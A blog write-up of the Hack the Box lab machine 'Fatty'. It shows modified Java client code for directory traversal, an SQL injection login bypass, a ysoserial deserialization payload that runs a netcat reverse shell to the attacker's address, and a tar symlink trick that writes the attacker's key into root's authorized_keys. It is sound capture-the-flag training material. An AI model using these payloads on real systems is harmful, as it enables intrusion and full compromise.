Blog
Search…
Fatty HTB writeup
Fatty Image
Fatty is an insane rated box in Hack the Box, it was extremely fun to do even though it took me ~50 hours of work to root it. This box will make you reverse engineer a java client and a server, write some code and learn how symlink really works behind different technologies.
Got some coffee and get ready to enjoy this master piece.
Enumeration
First things first, so Nmap gave us an FTP server with anonymous access allowed, also some other ports that nmap wasn't able to discover what was running on it.
1
# All ports result
2
PORT STATE SERVICE
3
21/tcp open ftp
4
22/tcp open ssh
5
1337/tcp open waste
6
1338/tcp open wmc-log-svc
7
1339/tcp open kjtsiteserver
8
​
9
​
10
# Script results
11
PORT STATE SERVICE VERSION
12
21/tcp open ftp vsftpd 2.0.8 or later
13
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
14
| -rw-r--r-- 1 ftp ftp 15426727 Oct 30 2019 fatty-client.jar
15
| -rw-r--r-- 1 ftp ftp 526 Oct 30 2019 note.txt
16
| -rw-r--r-- 1 ftp ftp 426 Oct 30 2019 note2.txt
17
|_-rw-r--r-- 1 ftp ftp 194 Oct 30 2019 note3.txt
18
| ftp-syst:
19
| STAT:
20
| FTP server status:
21
| Connected to 10.10.14.31
22
| Logged in as ftp
23
| TYPE: ASCII
24
| No session bandwidth limit
25
| Session timeout in seconds is 300
26
| Control connection is plain text
27
| Data connections will be plain text
28
| At session startup, client count was 2
29
| vsFTPd 3.0.3 - secure, fast, stable
30
|_End of status
31
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
32
| ssh-hostkey:
33
| 2048 fd:c5:61:ba:bd:a3:e2:26:58:20:45:69:a7:58:35:08 (RSA)
34
|_ 256 4a:a8:aa:c6:5f:10:f0:71:8a:59:c5:3e:5f:b9:32:f7 (ED25519)
35
1337/tcp open ssl/waste?
36
|_ssl-date: 2020-06-05T21:04:08+00:00; +53s from scanner time.
37
1338/tcp open ssl/wmc-log-svc?
38
|_ssl-date: 2020-06-05T21:04:08+00:00; +53s from scanner time.
39
1339/tcp open ssl/kjtsiteserver?
40
|_ssl-date: 2020-06-05T21:04:08+00:00; +53s from scanner time.
41
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Copied!
Foothold
Nmap told us the FTP service allowed anonymous access, is time to connect and see whats on the files
1
$ ftp 10.10.10.174
2
Connected to 10.10.10.174.
3
220 qtc's development server
4
Name (10.10.10.174:xnaaro): anonymous
5
230 Login successful.
6
Remote system type is UNIX.
7
Using binary mode to transfer files.
8
ftp> ls
9
200 PORT command successful. Consider using PASV.
10
150 Here comes the directory listing.
11
-rw-r--r-- 1 ftp ftp 15426727 Oct 30 2019 fatty-client.jar
12
-rw-r--r-- 1 ftp ftp 526 Oct 30 2019 note.txt
13
-rw-r--r-- 1 ftp ftp 426 Oct 30 2019 note2.txt
14
-rw-r--r-- 1 ftp ftp 194 Oct 30 2019 note3.txt
15
226 Directory send OK.
Copied!
First text file suggest the server has some kind of vulnerability and they changed default connection port but the fatty-client was updated with such changes.
1
$ cat note.txt
2
Dear members,
3
​
4
because of some security issues we moved the port of our fatty java server from 8000 to the hidden and undocumented port 1337.
5
Furthermore, we created two new instances of the server on port 1338 and 1339. They offer exactly the same server and it would be nice
6
if you use different servers from day to day to balance the server load.
7
​
8
We were too lazy to fix the default port in the '.jar' file, but since you are all senior java developers you should be capable of
9
doing it yourself ;)
10
​
11
Best regards,
12
qtc
Copied!
Second note told us they are using Java version 8
1
$ cat note2.txt
2
Dear members,
3
​
4
we are currently experimenting with new java layouts. The new client uses a static layout. If your
5
are using a tiling window manager or only have a limited screen size, try to resize the client window
6
until you see the login from.
7
​
8
Furthermore, for compatibility reasons we still rely on Java 8. Since our company workstations ship Java 11
9
per default, you may need to install it manually.
10
​
11
Best regards,
12
qtc
Copied!
Third note gave us login credentials.
1
$ cat note3.txt
2
Dear members,
3
​
4
We had to remove all other user accounts because of some seucrity issues.
5
Until we have fixed these issues, you can use my account:
6
​
7
User: qtc
8
Pass: clarabibi
9
​
10
Best regards,
11
qtc
Copied!
One we gathered some information, first tried to directly connect with fatty-client which gave us connection error since the port whose trying to connect was not opened.
Reverse engineer and rebuild package
At this point only thing we where able to do is to decompile the .jar package with
jd-gui program and export the resulting contents into our computer.First thing we need is to create a correct maven package layout. To do this copy
pom.xml and pom.properties from META-iNF/maven/fatty-client/fatty-client into package's root directory.Next move all contents from
htb to src folder (create it)Copy the following files from package root into a new
resources folder.1
$ ls -lsrta resources
2
total 72
3
4 drwxr-xr-x 8 xnaaro xnaaro 4096 Jun 13 21:29 ..
4
4 -rw-r--r-- 1 xnaaro xnaaro 1550 Jun 13 21:29 beans.xml
5
4 -rw-r--r-- 1 xnaaro xnaaro 2230 Jun 13 21:29 exit.png
6
8 -rw-r--r-- 1 xnaaro xnaaro 4317 Jun 13 21:30 fatty.p12
7
4 -rw-r--r-- 1 xnaaro xnaaro 831 Jun 13 21:30 log4j.properties
8
44 -rw-r--r-- 1 xnaaro xnaaro 41645 Jun 13 21:30 spring-beans-3.0.xsd
9
4 drwxr-xr-x 2 xnaaro xnaaro 4096 Jun 13 21:30 .
Copied!
As we saw in the notes.txt, the server port was changed to 1337, then modify
resources/beans.xml and change port to 1337Last step is to build the package with maven, it needs to be done with java version 8.
1
JAVA_HOME=/usr/lib/jvm/java-8-openjdk-amd64/ mvn package
Copied!
Add server.fatty.htb to /etc/hosts.
Run the client and connect to the server using credentials from note3.txt
1
/usr/lib/jvm/java-8-openjdk-amd64/bin/java -jar target/fatty-client.jar
Copied!
After enumerating the server with
qtc permissions, we saw the following file which informs qtc that only his user is enabled and all admin users removed, this is useful information for later steps.Contents of
-> mail -> dave.txt1
Hey qtc,
2
​
3
until the issues from the current pentest are fixed we have removed all administrative users from the database.
4
Your user account is the only one that is left. Since you have only user permissions, this should prevent exploitation
5
of the other issues. Furthermore, we implemented a timeout on the login procedure. Time heavy SQL injection attacks are
6
therefore no longer possible.
7
​
8
Best regards,
9
Dave
Copied!
Directory Traversal
At this point we had no idea of how to proceed as we still missing some server behavior knowledge prior exploitation of other vulnerabilities.
Now is time to check if directory traversal was a thing and it was, we were able to see some other files in a previous directory, but due some server side input validation only a single directory traversal was possible.
In the traversed directory with
..///////// payload we can see a file called fatty-server.jarModify
src/htb/fatty/client/methods/Invoker.java, might need to import some other classes at the begining of the java file.Modified code for directory traversal file listing
1
public String showFiles(String folder) throws MessageParseException, MessageBuildException, IOException {
2
String methodName = (new Object() { }).getClass().getEnclosingMethod().getName();
3
logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
4
if (AccessCheck.checkAccess(methodName, this.user)) {
5
return "Error: Method '" + methodName + "' is not allowed for this user account";
6
}
7
​
8
this.action = new ActionMessage(this.sessionID, "files");
9
this.action.addArgument("..///////");
10
sendAndRecv();
11
if (this.response.hasError()) {
12
return "Error: Your action caused an error on the application server!";
13
}
14
return this.response.getContentAsString();
15
}
Copied!
Modified code for file download
1
import java.io.File;
2
import java.io.FileOutputStream;
3
​
4
​
5
public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
6
String methodName = (new Object() { }).getClass().getEnclosingMethod().getName();
7
logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
8
if (AccessCheck.checkAccess(methodName, this.user)) {
9
return "Error: Method '" + methodName + "' is not allowed for this user account";
10
}
11
​
12
this.action = new ActionMessage(this.sessionID, "open");
13
this.action.addArgument("../////////");
14
this.action.addArgument("fatty-server.jar");
15
this.action.send(this.serverOutputStream);
16
this.message = Message.recv(this.serverInputStream);
17
this.response = new ResponseMessage(this.message);
18
FileOutputStream fop = null;
19
File file;
20
String content = "";
21
​
22
try {
23
​
24
file = new File("fatty-server.jar");
25
fop = new FileOutputStream(file);
26
​
27
if (!file.exists()) {
28
file.createNewFile();
29
}
30
byte[] contentInBytes = this.response.getContent();
31
​
32
fop.write(contentInBytes);
33
fop.flush();
34
fop.close();
35
​
36
System.out.println("Done");
37
​
38
} catch (IOException e) {
39
e.printStackTrace();
40
} finally {
41
try {
42
if (fop != null) {
43
fop.close();
44
}
45
} catch (IOException e) {
46
e.printStackTrace();
47
}
48
}
49
if (this.response.hasError()) {
50
return "Error: Your action caused an error on the application server!";
51
}
52
String response = "";
53
return response;
54
}
Copied!
Compile the client with maven again, login and click filebrowser on any folder, then click open.
At this point fatty-server.jar file should be already downloaded
Decompile server contents with
jd-gui.Some of the main thing noticed was a database connection.
Also on
checkLogin method we can see an SQL injection was possible as no input sanization was done.1
public class FattyDbSession
2
{
3
private static String url = "jdbc:mysql://database.fatty.htb:3306/Fatty";
4
private Connection conn;
5
private FattyLogger logger = new FattyLogger();
6
​
7
​
8
public FattyDbSession() throws SQLException {
9
Connection conn = null;
10
conn = DriverManager.getConnection(url, "qtc", "securedatabasepasswordpoweredbyclarabibi!");
11
this.conn = conn;
12
}
13
​
14
--------------------------------
15
​
16
public User checkLogin(User user) throws LoginException {
17
Statement stmt = null;
18
ResultSet rs = null;
19
User newUser = null;
20
​
21
try {
22
stmt = this.conn.createStatement();
23
rs = stmt.executeQuery("SELECT id,username,email,password,role FROM users WHERE username='" + user.getUsername() + "'");
24
​
25
--------------------------------
26
​
27
}
Copied!
SQL injection
At first tried many different SQLi payload but got no success, so build a local lab to emulating server side code and client connections.
After a few hours analyzing server responses and modifying client code, got a sucess SQLi.
This is the Client method we have to bypass
src/htb/fatty/shared/resources/User.java As we can see client side code will create a hash of username:password+string so our payload was not being executed properly.1
public User(int uid, String username, String password, String email, Role role) {
2
this.uid = uid;
3
this.username = username;
4
​
5
String hashString = this.username + password + "clarabibimakeseverythingsecure";
6
MessageDigest digest = null;
7
try {
8
digest = MessageDigest.getInstance("SHA-256");
9
} catch (NoSuchAlgorithmException e) {
10
e.printStackTrace();
11
}
12
byte[] hash = digest.digest(hashString.getBytes(StandardCharsets.UTF_8));
13
​
14
this.password = DatatypeConverter.printHexBinary(hash);
Copied!
Then found out I could send the hashed string of my choice directly modifying client side code.
Below is the code used to pass the hashed password instead of the generated in User.user method
src/htb/fatty/shared/message/LoginMessage.java1
public void send(OutputStream output) throws MessageBuildException, IOException {
2
String transfer = this.user.getUsername() + ":" + "5A67EA356B858A2318017F948BA505FD867AE151D6623EC32BE86E9C688BF046";
3
​
4
setPayload(transfer.getBytes());
5
byte[] message = getBytes();
6
output.write(message);
7
}
8
}
Copied!
All this information was after hours of debugging locally, this write up is not a step by step guide but rather a how to do some parts. You might need to investigate a bit more the code to fully understand and fix the code.
The payload used on username during logging was this, password field could be left empty as we hardcoded the hash in code.
The payload will return looked up server side data from the database and hardcode a role value with
'admin', this way we got admin role on the app without breaking other people fun changing content on the database.1
' UNION SELECT all id,username,email,password,'admin' from users where username='qtc
Copied!
And we got a successful login with admin privileged.
1
[AWT-EventQueue-1] INFO infoLogger - [+] Connection process finished.
2
[AWT-EventQueue-1] INFO infoLogger - ' UNION SELECT all id,username,email,password,'admin' from users where username='qtc
3
[AWT-EventQueue-1] INFO infoLogger - E42C818F80D72ED7E5752AE36777F97628942A23B8F4BBDA3C1A9068409549A9
4
[AWT-EventQueue-1] INFO infoLogger - ' UNION SELECT all id,username,email,password,'admin' from users where username='qtc:5A67EA356B858A2318017F948BA505FD867AE151D6623EC32BE86E9C688BF046
5
[AWT-EventQueue-1] INFO infoLogger - [+] Login successful!
Copied!
Java object serialization + RCE
Reviewing server side code was very clear that RCE was through object de-serialization on changePW method but the method was not fully implemented in client side code.
Now is time to make the client change password work to pass a new password in the client GUI
src/htb/fatty/client/gui/ClientGuiTest.java1
pwChangeButton.addActionListener(new ActionListener()
2
{
3
public void actionPerformed(ActionEvent e) {
4
String response = "";
5
String new_pass = textField_2.getText();
6
try {
7
response = ClientGuiTest.this.invoker.changePW(ClientGuiTest.this.currentFolder, new_pass);
8
} catch (MessageBuildException|htb.fatty.shared.message.MessageParseException e1) {
9
JOptionPane.showMessageDialog(controlPanel, "Failure during message building/parsing.", "Error", 0);
10
​
11
}
12
catch (IOException e2) {
13
JOptionPane.showMessageDialog(controlPanel, "Unable to contact the server. If this problem remains, please close and reopen the client.", "Error", 0);
14
}
15
​
16
​
17
​
18
textPane.setText(response);
19
}
20
});
Copied!
And modify the
changePW method to not encode the input and directly pass our base64 encoded payload src/htb/fatty/client/methods/Invoker.java1
public String changePW(String username2, String newPassword) throws MessageParseException, MessageBuildException, IOException {
2
String methodName = (new Object() { }).getClass().getEnclosingMethod().getName();
3
logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
4
if (AccessCheck.checkAccess(methodName, this.user)) {
5
return "Error: Method '" + methodName + "' is not allowed for this user account";
6
}
7
String username = "qtc";
8
User user = new User(username, newPassword);
9
​
10
this.action = new ActionMessage(this.sessionID, "changePW");
11
this.action.addArgument(new String(newPassword));
12
sendAndRecv();
13
if (this.response.hasError()) {
14
return "Error: Your action caused an error on the application server!";
15
}
16
return this.response.getContentAsString();
17
}
Copied!
At this point we were able to pass a base64 encoded payload during password change, but we still need to find a proper payload.
So at
pom.xml in server source we saw commons-collections 3.1 library is used.1
<dependency>
2
<groupId>commons-collections</groupId>
3
<artifactId>commons-collections</artifactId>
4
<version>3.1</version>
5
</dependency>
Copied!
Then used
ysoserial java app from github to create the payload with a reverse shell using CommonCollections7 and encoded in base64.1
$ /usr/lib/jvm/java-8-openjdk-amd64/bin/java -jar ~/Downloads/ysoserial-master-SNAPSHOT.jar CommonsCollections7 "nc -nv 10.10.14.31 4443 -e /bin/sh" > payload && base64 -w0 payload
2
rO0ABXNyABNqYXZhLnV0aWwuSGFzaHRhYmxlE7sPJSFK5LgDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/---------------+AC0AAAACeA==
Copied!
Right after sending the payload on new password during password change, we got a reverse shell as
qtc user inside a docker container.1
$ rlwrap nc -nvlp 4443
2
listening on [any] 4443 ...
3
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.174] 40519
4
id
5
uid=1000(qtc) gid=1000(qtc) groups=1000(qtc)
6
ls -lsrta
7
total 16
8
4 ---------- 1 qtc qtc 33 Oct 30 2019 user.txt
9
4 drwxr-xr-x 1 root root 4096 Oct 30 2019 ..
10
4 drwxr-sr-x 1 qtc qtc 4096 Oct 30 2019 .
11
4 drwx------ 1 qtc qtc 4096 Oct 30 2019 .ssh
12
/bin/sh -i
13
2f265ce12800:/home/qtc$ chmod 600 user.txt
14
2f265ce12800:/home/qtc$ cat user.txt
15
7fab2c31f------------------------
Copied!
Local enumeration
After some hours enumerating locally and trying different exploits, found out with
pspy64 an scp was being done every minute from a different host.1
2f265ce12800:/var/tmp$ ./pspy64 2>&1
2
​
3
2020/06/21 15:41:01 CMD: UID=0 PID=2571 | sshd: [accepted]
4
2020/06/21 15:41:01 CMD: UID=0 PID=2572 | sshd: [accepted]
5
2020/06/21 15:41:01 CMD: UID=1000 PID=2573 | sshd: qtc
6
2020/06/21 15:41:01 CMD: UID=1000 PID=2574 | scp -f /opt/fatty/tar/logs.tar
7
​
8
2020/06/21 15:42:01 CMD: UID=0 PID=2575 | /usr/sbin/sshd -R
9
2020/06/21 15:42:01 CMD: UID=22 PID=2576 | sshd: [net]
10
2020/06/21 15:42:02 CMD: UID=1000 PID=2577 | sshd: qtc
11
2020/06/21 15:42:02 CMD: UID=1000 PID=2578 | scp -f /opt/fatty/tar/logs.tar
Copied!
Privilege escalation
At this point a lot of work to understand the behaviour was required to get privesc on the other host.
The behavior of all this part was:
- First upload a tar file, inside the tar a file called the same way
logs.tarwith a symlink pointing to/root/.ssh/authorized_keys - The server extract the tar file and our new
logs.tarfile with the symlink replaces its own name with the link to authorized_keys - Then upload an authorized_keys file with same name as the link (Not a real tar file, just text file with tar extension)
- While scp'ing on the server it will follow the link
- At this point
/root/.ssh/authorized_keysis a link from tologs.tarwith our public key on it giving us root access into the box.
First create a logs_key.tar file with public key contents
1
cat id_rsa.pub > logs_key.tar
Copied!
Create a link called
logs.tar pointing to root authorized_keys, and compress it as .tar1
$ ln -s /root/.ssh/authorized_keys logs.tar
2
$ tar -cvf logs_link.tar logs.tar
3
logs.tar
Copied!
Inside the container download both files and remove existing
logs.tar file.First step in this privesc is to put the link, copy link tar as original name
logs.tar and wait a minute.1
2f265ce12800:/opt/fatty/tar$ wget http://10.10.14.31/logs_key.tar
2
2f265ce12800:/opt/fatty/tar$ rm logs.tar
3
2f265ce12800:/opt/fatty/tar$ cp logs_link.tar logs.tar
Copied!
At this point the link might be created, clean previous
logs.tar and replace it with our key file1
2f265ce12800:/opt/fatty/tar$ wget http://10.10.14.31/logs_key.tar
2
2f265ce12800:/opt/fatty/tar$ rm -rf logs.tar
3
2f265ce12800:/opt/fatty/tar$ cp logs_key.tar logs.tar
Copied!
We can see the files were copied two times
1
#pspy64
2
​
3
2020/06/23 18:11:01 CMD: UID=0 PID=912 | sshd: [accepted]
4
2020/06/23 18:11:01 CMD: UID=22 PID=913 | sshd: [net]
5
2020/06/23 18:11:01 CMD: UID=0 PID=914 | sshd: qtc [priv]
6
2020/06/23 18:11:02 CMD: UID=1000 PID=915 | scp -f /opt/fatty/tar/logs.tar
7
​
8
​
9
2020/06/23 18:12:01 CMD: UID=0 PID=919 | /usr/sbin/sshd -R
10
2020/06/23 18:12:01 CMD: UID=22 PID=920 | sshd: [net]
11
2020/06/23 18:12:01 CMD: UID=0 PID=921 | sshd: qtc [priv]
12
2020/06/23 18:12:01 CMD: UID=1000 PID=922 | ash -c scp -f /opt/fatty/tar/logs.tar
Copied!
Root
After the second
logs.tar is downloaded, we can SSH into the box as root user.1
$ ssh [email protected] -i id_rsa
2
Linux fatty 4.9.0-11-amd64 #1 SMP Debian 4.9.189-3+deb9u1 (2019-09-20) x86_64
3
​
4
The programs included with the Debian GNU/Linux system are free software;
5
the exact distribution terms for each program are described in the
6
individual files in /usr/share/doc/*/copyright.
7
​
8
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
9
permitted by applicable law.
10
Last login: Wed Jan 29 12:31:22 2020
11
[email protected]:~# id
12
uid=0(root) gid=0(root) groups=0(root)
13
[email protected]:~# hostname
14
fatty
15
[email protected]:~# cat root.txt
16
ee982fa19b41-------------------------
Copied!
Great, we rooted Fatty
To me this was one of the best boxes I've did on Hack the Box and the one on which I've spent more time until now (~50h).
Even though, it was fun and not the kind of boxes looking for unknown things
Regards
Last modified 1yr ago